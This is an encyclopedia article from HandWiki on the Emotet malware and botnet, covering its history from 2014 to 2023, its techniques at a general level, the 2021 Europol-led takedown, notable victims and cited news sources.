Software:Emotet

From HandWiki

Emotet is a malware strain and a cybercrime operation believed to be based in Ukraine.[1] The malware, also known as Heodo, was first detected in 2014 and deemed one of the most prevalent threats of the decade.[2][3][4] In 2021, the servers used for Emotet were disrupted through global police action in Germany and Ukraine and brought under the control of law enforcement.[4] Despite this disruption, Emotet resurfaced in subsequent years with new capabilities, continuing to be regarded as one of the Internet’s most persistent and adaptable threats.[5][6]

First versions of the Emotet malware functioned as a banking trojan aimed at stealing banking credentials from infected hosts. Throughout 2016 and 2017, Emotet operators, sometimes known as Mealybug, updated the trojan and reconfigured it to work primarily as a "loader," a type of malware that gains access to a system, and then allows its operators to download additional payloads.[7] Second-stage payloads can be any type of executable code, from Emotet's own modules to malware developed by other cybercrime gangs.

Initial infection of target systems often proceeds through a macro virus in an email attachment. The infected email is a legitimate-appearing reply to an earlier message that was sent by the victim.[8]

It has been widely documented that the Emotet authors have used the malware to create a botnet of infected computers to which they sell access in an infrastructure as a service (IaaS) model, referred in the cybersecurity community as MaaS (malware as a service), cybercrime as a service (CaaS), or crimeware.[9] Emotet is known for renting access to infected computers to ransomware operations, such as the Ryuk gang.[10]

History

In 2014, Emotet was first identified as a banking trojan designed to steal banking credentials from infected hosts. Within a year or two, the malware evolved into a more versatile and dangerous threat. It transformed into a loader, allowing operators to download additional malicious payloads onto infected systems, such as the TrickBot banking trojan and Ryuk ransomware.[5]

As of September 2019, the Emotet operation ran on top of three separate botnets called Epoch 1, Epoch 2, and Epoch 3.[11]

In mid-2020, Emotet re-emerged after a brief hiatus, launching widespread malspam campaigns targeting organizations globally. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported over 16,000 Emotet-related alerts across federal networks between July and October.[5] Emotet leveraged advanced evasion techniques, including polymorphic code, fileless persistence via PowerShell, lateral movement via nearby Wi-Fi networks, and email thread hijacking to increase the success of phishing attacks.[5] Campaigns often used malicious Microsoft Word documents with filenames like "form.doc" or "invoice.doc" to deliver the initial payload via PowerShell scripts.[12] Later in the year, Emotet operators also used parked domains to distribute malicious code.[13]

In January 2021, international action coordinated by Europol and Eurojust allowed investigators to take control of and disrupt the Emotet infrastructure.[14] The reported action was accompanied with arrests made in Ukraine.[15]

On 14 November 2021, new Emotet samples emerged that were very similar to the previous bot code, but with a different encryption scheme that used elliptic curve cryptography for command and control communications.[16] The new Emotet infections were delivered via TrickBot, to computers that were previously infected with TrickBot, and soon began sending malicious spam email messages with macro-laden Microsoft Word and Excel files as payloads.[17]

On 3 November 2022, new samples of Emotet emerged attached as a part of XLS files attached within email messages.[18][self-published source]

In March 2023, Emotet resurfaced after a four-month hiatus with a new spam campaign. Emails spoofed known contacts, addressed recipients by name, and mimicked prior threads. Attached Word documents were inflated to over 500MB using binary padding and included hidden Moby-Dick excerpts to evade detection. If macros were enabled, the document downloaded a ZIP file from a compromised site and executed a large DLL. The malware harvested credentials, sent spam, and installed secondary payloads such as TrickBot or Ryuk. Targets included organizations in Europe, Asia-Pacific, and Latin America.[6]

In late 2023, Microsoft and the U.S. National Institute of Standards and Technology (NIST) reported that attackers were using a Windows vulnerability to distribute malware, including Emotet. The technique involved phishing emails with malicious attachments that leveraged a Windows feature known as the App Installer. To reduce the risk of exploitation, Microsoft updated the software to disable the affected functionality by default.[19]

Noteworthy infections

  • Allentown, Pennsylvania, city located in Pennsylvania, United States (2018)[20][21]
  • Heise Online, publishing house based in Hanover, Germany (2019)[8]
  • Kammergericht Berlin, the highest court of the state of Berlin, Germany (2019)[22][23]
  • Humboldt University of Berlin, university in Berlin, Germany (2019)[24]
  • Universität Gießen, university in Germany (2019)[25]
  • Department of Justice of the province of Quebec (2020)[26]
  • Lithuanian government (2020)[27]
  • Democratic National Committee, political organization in the United States (2020)[5]
  • Government entities in France, Japan, and New Zealand (2020)[5]

References

  1. Ikeda, Scott (August 28, 2020). "Emotet Malware Taken Down By Global Law Enforcement". Cpomagazine. https://www.cpomagazine.com/cyber-security/emotet-malware-taken-down-by-global-law-enforcement-effort-cleanup-patch-pushed-to-1-6-million-infected-devices/. Retrieved May 1, 2021. 
  2. "Emotet's Malpedia entry". 2020-01-03. https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet. 
  3. Ilascu, Ionut (2019-12-24). "Emotet Reigns in Sandbox's Top Malware Threats of 2019". https://www.bleepingcomputer.com/news/security/emotet-reigns-in-sandboxs-top-malware-threats-of-2019/. 
  4. 4.0 4.1 European Union Agency for Criminal Justice Cooperation (2021-01-27). "World's most dangerous malware EMOTET disrupted through global action". https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action. 
  5. 5.0 5.1 5.2 5.3 5.4 5.5 "DHS warns that Emotet malware is one of the most prevalent threats today". 7 October 2020. https://arstechnica.com/information-technology/2020/10/dhs-warns-that-emotet-malware-is-one-of-the-most-prevalent-threats-today/. 
  6. 6.0 6.1 "Botnet that knows your name and quotes your email is back with new tricks". 13 March 2023. https://arstechnica.com/information-technology/2023/03/botnet-that-knows-your-name-and-quotes-your-email-is-back-with-new-tricks/. 
  7. Christiaan Beek (December 6, 2017). "Emotet Downloader Trojan Returns in Force". https://www.mcafee.com/blogs/other-blogs/mcafee-labs/emotet-downloader-trojan-returns-in-force/. 
  8. 8.0 8.1 Schmidt, Jürgen (June 6, 2019). "Trojaner-Befall: Emotet bei Heise" (in de). Heise Online. https://www.heise.de/ct/artikel/Trojaner-Befall-Emotet-bei-Heise-4437807.html. Retrieved November 10, 2019. 
  9. Brandt, Andrew (2019-12-02). "Emotet's Central Position in the Malware Ecosystem". Sophos. https://news.sophos.com/en-us/2019/12/02/emotets-central-position-in-the-malware-ecosystem/. Retrieved 2019-09-19. 
  10. "North Korean APT(?) and recent Ryuk Ransomware attacks". January 10, 2019. https://www.kryptoslogic.com/blog/2019/01/north-korean-apt-and-recent-ryuk-ransomware-attacks/. 
  11. Cimpanu, Catalin (2019-09-16). "Emotet, today's most dangerous botnet, comes back to life". ZDnet. https://www.zdnet.com/article/emotet-todays-most-dangerous-botnet-comes-back-to-life/. 
  12. "July 2020's Most Wanted Malware: Emotet Strikes Again After Five-Month Absence" (Press release). August 7, 2020.
  13. "Emotet uses parked domains to distribute payloads" (in en-US). 2020-10-30. https://howtofix.guide/emotet-uses-parked-domains-to-distribute-payloads/. 
  14. "World's most dangerous malware EMOTET disrupted through global action" (in en). https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action. 
  15. Cimpanu, Catalin, Authorities plan to mass-uninstall Emotet from infected hosts on March 25, 2021, zdnet, January 27, 2021
  16. "Emotet botnet returns after law enforcement mass-uninstall operation". The Records. November 15, 2021. https://therecord.media/emotet-botnet-returns-after-law-enforcement-mass-uninstall-operation/. 
  17. "Emotet Returns". SANS Internet Storm Center. https://isc.sans.edu/forums/diary/Emotet+Returns/28044/. 
  18. "Cryptolaemus (@Cryptolaemus1)" (in en). https://twitter.com/Cryptolaemus1/status/1587792659275448320. 
  19. "Vulnerability Change Records for CVE-2021-43890". 29 May 2024. https://nvd.nist.gov/vuln/detail/CVE-2021-43890/change-record?changeRecordedOn=05/29/2024T11:15:50.500-0400. 
  20. "Malware infection poised to cost $1 million to Allentown, Pa.". The Washington Times. https://www.washingtontimes.com/news/2018/feb/21/malware-infection-posed-cost-1-million-allentown-p/. 
  21. "Emotet malware gang is mass-harvesting millions of email in mysterious campaign". https://www.zdnet.com/article/emotet-malware-gang-is-mass-harvesting-millions-of-emails-in-mysterious-campaign/. 
  22. "Emotet: Trojaner-Angriff auf Berliner Kammergericht" (in de). Der Spiegel. October 4, 2019. https://www.spiegel.de/netzwelt/web/emotet-berliner-kammergericht-wird-opfer-einer-trojaner-attacke-a-1289919.html. 
  23. "Emotet: Wie ein Trojaner das höchste Gericht Berlins lahmlegte" (in de). Frankfurter Allgemeine Zeitung. https://www.faz.net/aktuell/wirtschaft/diginomics/emotet-wie-ein-trojaner-das-hoechste-gericht-berlins-lahmlegte-16442702.html. 
  24. "Trojaner greift Netzwerk von Humboldt-Universität an" (in de). dpa. Heise Online. November 9, 2019. https://www.heise.de/newsticker/meldung/Trojaner-greift-Netzwerk-von-Humboldt-Universitaet-an-4583300.html. Retrieved November 10, 2019. 
  25. "Trojaner-Befall: Uni Gießen nutzt Desinfec't für Aufräumarbeiten" (in de). Heise Online. December 19, 2019. https://www.heise.de/security/meldung/Trojaner-Befall-Uni-Giessen-nutzt-Desinfec-t-fuer-Aufraeumarbeiten-4617154.html?wt_mc=rss.red.ho.beitrag.atom.beitrag.beitrag. Retrieved December 22, 2019. 
  26. Joncas, Hugo (September 12, 2020). "Les pirates informatiques ont pu voler tous les courriels". https://www.journaldemontreal.com/2020/09/12/les-pirates-informatiques-ont-pu-voler-tous-les-courriels. 
  27. "Several institutions affected by email virus in Lithuania – center". https://www.baltictimes.com/several_institutions_affected_by_email_virus_in_lithuania___center/. 

Template:Hacking in the 2020s



Retrieved from "https://handwiki.org/wiki/index.php?title=Software:Emotet&oldid=3952017"